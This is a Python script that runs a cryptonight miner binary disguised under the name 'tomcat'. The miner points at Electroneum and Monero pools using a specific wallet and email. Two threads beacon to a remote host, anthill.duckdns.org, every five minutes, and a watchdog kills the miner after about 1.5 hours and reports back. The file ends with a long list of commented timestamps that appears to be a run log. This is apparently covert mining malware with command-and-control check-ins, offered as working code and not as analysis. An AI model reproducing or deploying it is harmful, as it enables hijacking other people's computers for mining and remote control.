import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:19:02.204144
#2018-02-17 16:07:01.719592
#2018-02-17 17:55:01.858382
#2018-02-17 19:42:03.825597
#2018-02-17 21:31:04.554775
#2018-02-17 23:15:06.569878
#2018-02-18 01:02:06.016297
#2018-02-18 02:50:07.804858
#2018-02-18 04:40:07.031537
#2018-02-18 06:32:06.770674
#2018-02-18 08:19:06.831308
#2018-02-18 10:07:05.870803
#2018-02-18 11:53:05.858927
#2018-02-18 13:37:07.080924
#2018-02-18 15:27:06.071235
#2018-02-18 17:16:05.024720
#2018-02-18 19:04:05.868974
#2018-02-18 20:51:05.373911
#2018-02-18 22:38:06.262132
#2018-02-19 00:27:05.833693
#2018-02-19 02:12:01.463057
#2018-02-19 03:58:07.791156
#2018-02-19 05:43:05.149173
#2018-02-19 07:31:01.436447
#2018-02-19 09:21:07.383667
#2018-02-19 11:10:10.442819
#2018-02-19 12:58:06.231261
#2018-02-19 14:45:03.095348
#2018-02-19 16:33:08.984805
#2018-02-19 18:21:01.405258
#2018-02-19 20:07:04.864398
#2018-02-19 21:57:01.515855
#2018-02-19 23:42:05.878409
#2018-02-20 01:29:05.585477
#2018-02-20 03:18:02.019938
#2018-02-20 05:04:01.900920
#2018-02-20 06:47:07.188268
#2018-02-20 08:33:05.513082
#2018-02-20 10:17:08.923369
#2018-02-20 12:02:08.854346
#2018-02-20 13:50:09.947207
#2018-02-20 15:36:06.418377
#2018-02-20 17:21:07.083863
#2018-02-20 19:12:05.418778
#2018-02-20 21:00:12.440717
#2018-02-20 22:46:05.440869
#2018-02-21 00:31:02.204462
#2018-02-21 02:16:04.793348
#2018-02-21 04:02:06.764420
#2018-02-21 05:49:01.638943
#2018-02-21 07:36:07.948853
#2018-02-21 09:21:01.678030
#2018-02-21 11:09:07.500761
#2018-02-21 12:57:02.201856
#2018-02-21 14:44:10.455801
#2018-02-21 16:31:15.188848
#2018-02-21 18:22:09.805500
#2018-02-21 20:07:01.311190
#2018-02-21 21:53:06.692095
#2018-02-21 23:41:04.597188
#2018-02-22 01:30:04.553002
#2018-02-22 03:18:03.981469
#2018-02-22 05:05:08.493899
#2018-02-22 06:48:07.941101
#2018-02-22 08:37:04.245495
#2018-02-22 10:24:06.495830
#2018-02-22 12:10:09.576264
#2018-02-22 13:55:07.937717
#2018-02-22 15:44:01.742645
#2018-02-22 17:29:11.728073
#2018-02-22 19:16:06.544870
#2018-02-22 21:09:06.276654
#2018-02-22 22:55:04.031934
#2018-02-23 00:41:08.571201
#2018-02-23 02:29:07.855871
#2018-02-23 04:18:05.359731
#2018-02-23 06:04:05.820610
#2018-02-23 07:51:08.075836
#2018-02-23 10:08:07.294212
#2018-02-23 12:02:10.702449
#2018-02-23 13:51:02.052073
#2018-02-23 15:43:01.628809
#2018-02-23 17:29:08.900858
#2018-02-23 19:17:08.043124
#2018-02-23 21:00:08.694220
#2018-02-23 22:45:07.401948
#2018-02-24 00:32:04.480331
#2018-02-24 02:23:07.547089
#2018-02-24 04:13:06.846990
#2018-02-24 06:03:01.677678
#2018-02-24 07:50:07.755847
#2018-02-24 09:36:04.050055
#2018-02-24 11:29:06.658722
#2018-02-24 13:18:06.665597
#2018-02-24 15:09:04.041987
#2018-02-24 16:57:07.180715
#2018-02-24 18:44:05.171993
#2018-02-24 20:35:08.664893
#2018-02-24 22:39:07.129900
#2018-02-25 01:46:03.692367
#2018-02-25 05:05:08.040863
#2018-02-25 10:11:01.517341